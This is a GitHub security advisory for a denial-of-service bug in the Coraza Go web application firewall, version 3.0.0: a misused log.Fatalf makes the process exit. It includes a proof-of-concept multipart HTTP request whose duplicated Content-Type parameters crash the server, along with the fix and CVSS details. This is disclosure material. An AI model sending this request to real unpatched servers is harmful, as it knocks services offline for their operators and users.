Skip to content

Potential deny of service

High
jptosso published GHSA-c2pj-v37r-2p6h Jun 25, 2023

Package

gomod github.com/corazawaf/coraza (Go)

Affected versions

3.0.0

Patched versions

3.0.1

Description

Summary

Due to the misuse of log.Fatalf, the application using coraza crashed after receiving crafted requests from attackers.

Details

coraza/internal/bodyprocessors/multipart.go

Lines 26 to 29 in 82157f8

mediaType, params, err := mime.ParseMediaType(mimeType)
if err != nil {
log.Fatalf("failed to parse media type: %s", err.Error())
}

The bodyprocessors of multipart uses log.Fatalf to handle errors from the mime.ParseMediaType, but log.Fatalf calls os.Exit directly after logging the error.
https://github.com/golang/go/blob/a031f4ef83edc132d5f49382bfef491161de2476/src/log/log.go#L288-L291
This means that the application will immediately crash after receiving a malicious request that triggers an error in mime.ParseMediaType.

PoC

The server can be demonstrated by https://github.com/corazawaf/coraza/tree/main/examples/http-server

After sending this request

POST / HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: curl/8.1.2
Accept: */*
Content-Length: 199
Content-Type: multipart/form-data; boundary=------------------------5fa6351b877326a1; a=1; a=2
Connection: close

--------------------------5fa6351b877326a1
Content-Disposition: form-data; name="file"; filename="123"
Content-Type: application/octet-stream

123

--------------------------5fa6351b877326a1--

The server will crash immediately. The a=1; a=2 in Content-Type makes mime: duplicate parameter name error.

Impact

I believe the vulnerability was introduced by the following commit: 24af0c8.

Mitigation

The error from mime.ParseMediaType should return directly.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2023-40586

Weaknesses

No CWEs

Credits